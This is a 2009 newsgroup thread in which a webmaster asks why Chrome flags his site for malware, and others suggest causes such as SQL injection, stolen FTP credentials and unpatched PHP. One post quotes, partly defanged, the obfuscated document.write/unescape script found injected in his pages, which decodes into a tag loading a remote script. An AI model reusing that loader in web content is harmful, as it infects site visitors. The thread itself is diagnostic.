Web site compromised?

Discussion in 'Computer Security' started by Kompu Kid, Apr 22, 2009.

  1. Kompu Kid

    Kompu Kid Guest

    Hello All:

    A website I manage seems to have a problem when I tried to access it
    today with Chrome browser.

    Chrome gives the following warning:


    "Warning: Visiting this site may harm your computer!
    The website at www.XXXX.YYY (I am not giving the actual URL) contains
    elements from the site beebest.cn, which appears to host malware –
    software that can hurt your computer or otherwise operate without your
    consent. Just visiting a site that contains malware can infect your
    computer.
    For detailed information about the problems with these elements, visit
    the Google Safe Browsing diagnostic page for beebest.cn.
    Learn more about how to protect yourself from harmful software online.
    I understand that visiting this site may harm my computer. "

    How can "elements" from beebest.cn can be on this site? What "do"
    elements mean in this case?

    I am downloading the site and will do a text search for "beebest" .

    Any other recommendations?

    Thanks

    Deguza
     
    Kompu Kid, Apr 22, 2009
    #1
    1. Advertising

  2. Kompu Kid

    Kompu Kid Guest

    On Apr 22, 12:46 am, Kompu Kid <> wrote:
    > Hello All:
    >
    > A website I manage seems to have a problem when I tried to access it
    > today with Chrome browser.
    >
    > Chrome gives the following warning:
    >
    > "Warning: Visiting this site may harm your computer!
    > The website atwww.XXXX.YYY(I am not giving the actual URL) contains
    > elements from the site beebest.cn, which appears to host malware –
    > software that can hurt your computer or otherwise operate without your
    > consent. Just visiting a site that contains malware can infect your
    > computer.
    > For detailed information about the problems with these elements, visit
    > the Google Safe Browsing diagnostic page for beebest.cn.
    > Learn more about how to protect yourself from harmful software online.
    >  I understand that visiting this site may harm my computer.  "
    >
    > How can "elements" from beebest.cn can be on this site? What "do"
    > elements mean in this case?
    >
    > I am downloading the site and will do a text search for "beebest" .
    >
    > Any other recommendations?
    >
    > Thanks
    >
    > Deguza


    I just had a friend try to access my website. He got the same message
    except the beebest.cn was replaced by www.corpamata.cn.

    What is going on?

    Deguza
     
    Kompu Kid, Apr 22, 2009
    #2
    1. Advertising

  3. Kompu Kid

    Martin Guest

    Kompu Kid wrote:
    > On Apr 22, 12:46 am, Kompu Kid <> wrote:
    >> Hello All:
    >>
    >> A website I manage seems to have a problem when I tried to access it
    >> today with Chrome browser.
    >>
    >> Chrome gives the following warning:
    >>
    >> "Warning: Visiting this site may harm your computer!
    >> The website atwww.XXXX.YYY(I am not giving the actual URL) contains
    >> elements from the site beebest.cn, which appears to host malware –
    >> software that can hurt your computer or otherwise operate without your
    >> consent. Just visiting a site that contains malware can infect your
    >> computer.
    >> For detailed information about the problems with these elements, visit
    >> the Google Safe Browsing diagnostic page for beebest.cn.
    >> Learn more about how to protect yourself from harmful software online.
    >> I understand that visiting this site may harm my computer. "
    >>
    >> How can "elements" from beebest.cn can be on this site? What "do"
    >> elements mean in this case?
    >>
    >> I am downloading the site and will do a text search for "beebest" .
    >>
    >> Any other recommendations?
    >>
    >> Thanks
    >>
    >> Deguza

    >
    > I just had a friend try to access my website. He got the same message
    > except the beebest.cn was replaced by www.corpamata.cn.
    >
    > What is going on?


    Dunno, but if it were my site I'd be looking to sack the webmaster
    because he doesn't seem to know what he's doing.

    Post the frigging site and you might get a descent answer from someone
    who bothers to go and look at the code.
    >
    > Deguza
    >
     
    Martin, Apr 22, 2009
    #3
  4. Kompu Kid

    Kompu Kid Guest

    On Apr 22, 1:28 am, Martin <> wrote:
    > Kompu Kid wrote:
    > > On Apr 22, 12:46 am, Kompu Kid <> wrote:
    > >> Hello All:

    >
    > >> A website I manage seems to have a problem when I tried to access it
    > >> today with Chrome browser.

    >
    > >> Chrome gives the following warning:

    >
    > >> "Warning: Visiting this site may harm your computer!
    > >> The website atwww.XXXX.YYY(Iam not giving the actual URL) contains
    > >> elements from the site beebest.cn, which appears to host malware –
    > >> software that can hurt your computer or otherwise operate without your
    > >> consent. Just visiting a site that contains malware can infect your
    > >> computer.
    > >> For detailed information about the problems with these elements, visit
    > >> the Google Safe Browsing diagnostic page for beebest.cn.
    > >> Learn more about how to protect yourself from harmful software online.
    > >>  I understand that visiting this site may harm my computer.  "

    >
    > >> How can "elements" from beebest.cn can be on this site? What "do"
    > >> elements mean in this case?

    >
    > >> I am downloading the site and will do a text search for "beebest" .

    >
    > >> Any other recommendations?

    >
    > >> Thanks

    >
    > >> Deguza

    >
    > > I just had a friend try to access my website. He got the same message
    > > except the beebest.cn was replaced bywww.corpamata.cn.

    >
    > > What is going on?

    >
    > Dunno, but if it were my site I'd be looking to sack the webmaster
    > because he doesn't seem to know what he's doing.
    >
    > Post the frigging site and you might get a descent answer from someone
    > who bothers to go and look at the code.
    >
    >
    >
    > > Deguza


    These guys are complaining about the same thing. However, some are
    finding no problems...

    http://www.greenockmorton.org/forum/index.php?showtopic=26972

    Deguza
     
    Kompu Kid, Apr 22, 2009
    #4
  5. Kompu Kid

    1PW Guest

    On 04/22/2009 12:46 AM, Kompu Kid sent:
    > Hello All:
    >
    > A website I manage seems to have a problem when I tried to access it
    > today with Chrome browser.
    >
    > Chrome gives the following warning:
    >
    >
    > "Warning: Visiting this site may harm your computer!
    > The website at www.XXXX.YYY (I am not giving the actual URL) contains
    > elements from the site beebest.cn, which appears to host malware –
    > software that can hurt your computer or otherwise operate without your
    > consent. Just visiting a site that contains malware can infect your
    > computer.
    > For detailed information about the problems with these elements, visit
    > the Google Safe Browsing diagnostic page for beebest.cn.
    > Learn more about how to protect yourself from harmful software online.
    > I understand that visiting this site may harm my computer. "
    >
    > How can "elements" from beebest.cn can be on this site? What "do"
    > elements mean in this case?
    >
    > I am downloading the site and will do a text search for "beebest" .
    >
    > Any other recommendations?
    >
    > Thanks
    >
    > Deguza


    Hello Deguza:

    I too believe we should be dealing with specifics. Please reply with
    your site's true and complete URL in the form of:

    <hxxp://www.xxxx.yyy/>
    ^^

    In the meantime, you may wish to see if your application software is
    updated to the latest possible versions so as to have all possible
    security holes plugged. If you also manage the website's OS please post
    a great deal of detail on its state of revision. It wouldn't hurt to
    give us the ISP so we don't have to dig for it. Do you also maintain
    its hardware?

    Warm regards,

    Pete
    --
    1PW @?6A62?FEH9:DE=6o2@=]4@> [r4o7t]
     
    1PW, Apr 22, 2009
    #5
  6. Kompu Kid

    John Holmes Guest

    Kompu Kid "contributed" in alt.hacker:

    > (I am not giving the actual URL)


    Don't expect any help then.

    --
    <snip>
     
    John Holmes, Apr 22, 2009
    #6
  7. Kompu Kid

    Kompu Kid Guest

    On Apr 22, 2:21 pm, "erewhon" <> wrote:
    > A website I manage seems to have a problem when I tried to access it
    > today with Chrome browser.
    >
    > Does it use SQL queries. If so, likely malware was inserted via SQL
    > injection


    No, it does not use SQL queries.

    I found this in one of the pages. I have not put this in there, unless
    FrontPage, or the webhosting software put it in.

    Or it could be the infection (I am putting "-"s in some of the key
    words just in case it tries to execute on a the web...):

    <s-c-ript la-ngu-age=ja-va-script><!--
    do-cu-ment.w-rite(-u-n-e-s-c-a-p-e('ii%3CscriiipzIlt%20lhsCEtrgKc%3D%2F
    %2F940Cm%2E24Joq7%2Emeu2%2EgK19vN65gK%2FjzIlqulhevN6ryii%2ECEtjCEtsmeu
    %3EvN6%3C%2Fscriptlh%3E').rep-la-ce(/lh|vN6|meu|0Cm|Joq|zIl|CEt|pTv|gK|
    ii/g,""));
    --></script><body>
     
    Kompu Kid, Apr 22, 2009
    #7
  8. Kompu Kid

    Kompu Kid Guest

    On Apr 22, 9:22 am, John Holmes <> wrote:
    > Kompu Kid "contributed" in alt.hacker:
    >
    > > (I am not giving the actual URL)

    >
    > Don't expect any help then.
    >
    > --
    > <snip>


    I did not want anybody getting infected, that's why I did not give it
    out.

    Deguza
     
    Kompu Kid, Apr 23, 2009
    #8
  9. Kompu Kid

    Todd H. Guest

    Todd H., Apr 23, 2009
    #9
  10. Kompu Kid <> contributed wisdom to news:f1923657-9ee8-
    :

    > I am downloading the site and will do a text search for "beebest" .
    >
    > Any other recommendations?
    >


    Do you have any dynamic content?
    Do you run banner ads that are not on your machine but are links to another
    machine?
    Do you include google keyword advertising?
    Do you have a link to a webring at the bottom of the webpage?

    Gandalf Parker
     
    Gandalf Parker, Apr 23, 2009
    #10
  11. Kompu Kid

    Kompu Kid Guest

    UPDATE:

    * I found also a My hosting services told me that an infection on my
    personal computer is probably where the injection of suspect codes
    have started. He says the virus on my computer used the ftp link I
    have to the web hosting site.

    * In addition to the script I gave earlier, I found on some pages
    another piece of code that had an "iframe" html command. The iframe
    was referring to a chinese site "betwager". I am not able to write the
    full code and the site. Google won't let me post it.
     
    Kompu Kid, Apr 23, 2009
    #11
  12. Kompu Kid

    Kompu Kid Guest

    On Apr 23, 4:03 pm, "David H. Lipman" <DLipman~>
    wrote:
    > From: "Kompu Kid" <>
    >
    > | UPDATE:
    >
    > | * I found also a My hosting services told me that an infection on my
    > | personal computer is probably where the injection of suspect codes
    > | have started. He says the virus on my computer used the ftp link I
    > | have to the web hosting site.
    >
    > | * In addition to the script I gave earlier, I found on some pages
    > | another piece of code that had an "iframe" html command. The iframe
    > | was referring to a chinese site "betwager". I am not able to write the
    > | full code and the site. Google won't let me post it.
    >
    > Don't use Google !
    >
    > news://nntp.aioe.org/alt.computer.security
    > Crosss-Posted to the other groups.
    >
    > As for your hosting company, they could be wrong are just passing the blame to you.
    > Chances are MORE likely that you use an application on the server with vulnerabilities and
    > malicious actors have exploited them to add malicious code to your site.
    >
    > --
    > Davehttp://www.claymania.com/removal-trojan-adware.html
    > Multi-AV -http://www.pctipp.ch/downloads/dl/35905.asp


    It seems like I need to install a newsreader on my computer to use the
    "news://nntp.aioe.org/alt.computer.security ".

    Outlooked volunteered when I put that in my Chrome's address area, but
    I do not want to use it.

    Any recommendations for a news reader for the XP environment? If it
    matters, I use Firefox in addition to chrome.

    Deguza
     
    Kompu Kid, Apr 24, 2009
    #12
  13. Kompu Kid

    Todd H. Guest

    "David H. Lipman" <DLipman~nospam~@Verizon.Net> writes:

    > From: "Kompu Kid" <>
    >
    >
    >
    > | UPDATE:
    >
    > | * I found also a My hosting services told me that an infection on my
    > | personal computer is probably where the injection of suspect codes
    > | have started. He says the virus on my computer used the ftp link I
    > | have to the web hosting site.
    >
    > | * In addition to the script I gave earlier, I found on some pages
    > | another piece of code that had an "iframe" html command. The iframe
    > | was referring to a chinese site "betwager". I am not able to write the
    > | full code and the site. Google won't let me post it.
    > Crosss-Posted to the other groups.
    >
    > As for your hosting company, they could be wrong are just passing the blame to you.
    > Chances are MORE likely that you use an application on the server with vulnerabilities and
    > malicious actors have exploited them to add malicious code to your site.


    Much agreed. PHP is so pourous that it's much more likely to be a
    direct attack on your site rather than some convoluted "trojan on your
    computer that modifies local html and then magically knows what FTP
    client you're using, reuses its cached password for the site and loads
    the modified html onto the remote site."

    The target audience for such a client side sploit is so small it
    wouldn't be worthwhile.

    visit http://www.securityfocus.com/vulnerabilities

    and for each of the following, chase down what vulns there are for it
    for the version of each your site is running

    Web server version (apache whatever likely)
    php version on the server
    what php forum script you're using / version


    And see what vulns are in each for the versions you have, and that'll
    wittle down the "how" in what happened perhaps.


    --
    Todd H.
    http://www.toddh.net/
     
    Todd H., Apr 24, 2009
    #13
  14. Kompu Kid

    ©Ari® Guest

    On Thu, 23 Apr 2009 15:11:49 -0700 (PDT), Kompu Kid wrote:

    > * I found also a My hosting services told me that an infection on my
    > personal computer is probably where the injection of suspect codes
    > have started. He says the virus on my computer used the ftp link I
    > have to the web hosting site.


    LOL
    --
    A fireside chat not with Ari!
    http://tr.im/holj
    Motto: Live To Spooge It!
     
    ©Ari®, Apr 24, 2009
    #14
  15. Kompu Kid

    DGB Guest

    ©Ari® wrote:
    > On Thu, 23 Apr 2009 15:11:49 -0700 (PDT), Kompu Kid wrote:
    >
    >> * I found also a My hosting services told me that an infection on my
    >> personal computer is probably where the injection of suspect codes
    >> have started. He says the virus on my computer used the ftp link I
    >> have to the web hosting site.

    >
    > LOL


    Can you/will you expand on your comment, ©Ari® ?

    Thanks
     
    DGB, Apr 24, 2009
    #15
  16. Kompu Kid

    Doc Guest

    Kompu Kid <> wrote in news:da2c3ba5-46fc-4b8d-a28f-
    :

    > On Apr 22, 9:22 am, John Holmes <> wrote:
    >> Kompu Kid "contributed" in alt.hacker:
    >>
    >> > (I am not giving the actual URL)

    >>
    >> Don't expect any help then.
    >>
    >> --
    >> <snip>

    >
    > I did not want anybody getting infected, that's why I did not give it
    > out.


    If you're posting a message in a hacker forum with a warning that you
    think the site might be compromised, then the people who look at it are
    forewarned.

    Not posting the URL is stupid. People who can do low-tech stuff like
    telnet to the server and download the page for analysis can't do that if
    they don't know where it is.

    It's like telling someone you think you have an STD, but not going to the
    doctor to really find out.



    Doc.

    --
    The bigger the humbug, the better people will like it.
    - Phineas Taylor Barnum.
     
    Doc, Apr 24, 2009
    #16
  17. Kompu Kid

    Doc Guest

    Kompu Kid <> wrote in
    news::

    <snip>

    > Any recommendations for a news reader for the XP environment? If it
    > matters, I use Firefox in addition to chrome.


    I still like X-News.

    http://download.cnet.com/Xnews/3000-2164_4-10026377.html

    Really should download and try the latest version, but the one I have just
    works - no attempts to execute code or render pages, so very safe.


    Doc.

    --
    The bigger the humbug, the better people will like it.
    - Phineas Taylor Barnum.
     
    Doc, Apr 24, 2009
    #17
  18. Kompu Kid

    John Holmes Guest

    Kompu Kid "contributed" in alt.hacker:

    > On Apr 22, 9:22 am, John Holmes <> wrote:
    >> Kompu Kid "contributed" in alt.hacker:
    >>
    >> > (I am not giving the actual URL)

    >>
    >> Don't expect any help then.
    >>
    >> --
    >> <snip>

    >
    > I did not want anybody getting infected, that's why I did not give it
    > out.
    >
    > Deguza


    I'll second Doc.

    Most of the regulars here know what they're doing. FYI, my system will
    not get infected by just browsing to a compromised website.

    --
    <snip>
     
    John Holmes, Apr 25, 2009
    #18
  19. Kompu Kid

    ~BD~ Guest

    John Holmes wrote:

    > I'll second Doc.
    >
    > Most of the regulars here know what they're doing. FYI, my system will
    > not get infected by just browsing to a compromised website.
    >


    Hello John :)

    Please will you explain how/why *your* system will not be so infected
    yet other folk may be?

    Might it simply be because you aren't using Microsoft Windows?

    --
    Dave
     
    ~BD~, Apr 25, 2009
    #19
  20. Kompu Kid

    John Holmes Guest

    ~BD~ "contributed" in alt.hacker:

    > John Holmes wrote:
    >
    >> I'll second Doc.
    >>
    >> Most of the regulars here know what they're doing. FYI, my system will
    >> not get infected by just browsing to a compromised website.
    >>

    >
    > Hello John :)
    >
    > Please will you explain how/why *your* system will not be so infected
    > yet other folk may be?
    >
    > Might it simply be because you aren't using Microsoft Windows?
    >
    > --
    > Dave
    >


    As a matter of fact, I'm using WinXP for my daily use. My 5 workstations
    and 4 wireless laptops (some XP, some Slackware) are all behind 2 Windows
    2008 DC's running ISA server and Forefront. That setup keeps my local
    network free of mal/spy-ware, viruses and other nasties. The servers are
    really in use as servers, i.e. nobody touches them but me and no websites
    are ever visited on them.

    I hope my answer satisfied you.

    --
    <snip>
     
    John Holmes, Apr 25, 2009
    #20
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. shahidsheikh....com
    Replies:
    5
    Views:
    3,728
    farmerc
    Sep 21, 2007
  2. Jene Keller
    Replies:
    4
    Views:
    539
  3. Steve

    Has my Internet Explorer been Compromised ?

    Steve, Sep 27, 2004, in forum: Computer Security
    Replies:
    5
    Views:
    896
    Hairy One Kenobi
    Sep 30, 2004
  4. Replies:
    10
    Views:
    670
    David H. Lipman
    Jun 29, 2006
  5. Lawrence D'Oliveiro

    Local Site Compromised

    Lawrence D'Oliveiro, May 12, 2011, in forum: NZ Computing
    Replies:
    0
    Views:
    303
    Lawrence D'Oliveiro
    May 12, 2011
Loading...

Share This Page